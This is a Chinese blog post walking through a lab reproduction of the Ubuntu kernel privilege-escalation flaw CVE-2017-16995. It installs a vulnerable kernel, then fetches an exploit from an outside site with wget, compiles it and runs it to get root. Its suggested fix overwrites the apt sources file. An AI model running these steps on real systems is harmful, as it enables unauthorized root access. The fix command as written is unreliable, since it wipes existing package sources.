CVE-2017-16995本地提权复现

ubuntu本地提权漏洞复现

参考资料
Ubuntu内核提权:CVE-2017-16995漏洞复现
漏洞预警 | Ubuntu存在本地提权漏洞(附EXP及应对措施)
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - ‘AF_PACKET’ Race Condition Privilege Escalation

漏洞影响版本

Linux Kernel Version 4.14-4.4
仅影响Ubuntu/Debian发行版本

准备环境

查看内核版本

uname -r

uname
搜索版本

apt-cache search linux

apt-cache
下载4.4版本的内核

sudo apt-get install linux-headers-4.4.0-81-generic linux-image-4.4.0-81-generic

sudo
更换内核

sudo nano /boot/grub/grub.cfg

nano
替换成下图
4.4.0
ctrl+o保存,ctrl+x退出,重启
到此,环境就配置完毕

验证

脚本下载

wget http://cyseclabs.com/pub/upstream44.c

wget
编译

gcc -o exp upstream44.c

gcc
运行

./exp

root
可以看到前面的用户名已经从ubuntu变成了root,可以执行任何需要超级权限的命令

修复建议

升级Linux Kernel 版本(需重启)

echo "deb http://archive.ubuntu.com/ubuntu/ xenial-proposed restricted main multiverse universe" > /etc/apt/sources.list && apt update && apt install linux-image-4.4.0-117-generic

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!